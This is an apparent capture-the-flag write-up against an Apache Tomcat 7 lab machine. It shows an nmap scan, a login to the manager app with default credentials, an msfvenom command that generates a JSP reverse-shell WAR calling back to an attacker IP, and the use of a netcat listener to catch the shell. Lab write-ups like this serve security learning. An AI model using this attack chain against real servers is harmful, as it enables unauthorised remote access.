Reconnaisance

Nmap Recon Results

Discovery OS System

** Recoon open Ports**

nmap -sS --min-rate 5000 --open -n 10.129.156.40 -vvv -oG initialscan

Service Enumeration

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

So here, we notice very interesting result from nmap scan, it shows port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1

Web Service Next order of business is to browse the IP on a Web Browser.

http://10.129.156.40:8080/

On opening the IP on the Web Browser, we are greeted with the default TomCat page. After some enumeration here and there, we found the โ€œManager Appโ€ Link. Upon clicking this link, we are struck with a Login Form as shown below.

Here, after some tweaking with some passwords and other stuff, we found that clicking on โ€œCancelโ€ Button triggers a 401 Error as shown in the image.

User: tomcat
Password: s3cret

once logged in we notice that we can upload war files so we will generate a reverse shell with format .war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.31 LPORT=443 --platform windows -a x86 -f war -o shell.war

Select File -> shell.war -> Deploy

Explotation

well, we have already uploaded our war file and we can view it in the applications tab of the web service, so we open a session netcat listener on my box to get the reverse shell

and click it in our shell.war

as can see we don’t need priv esc.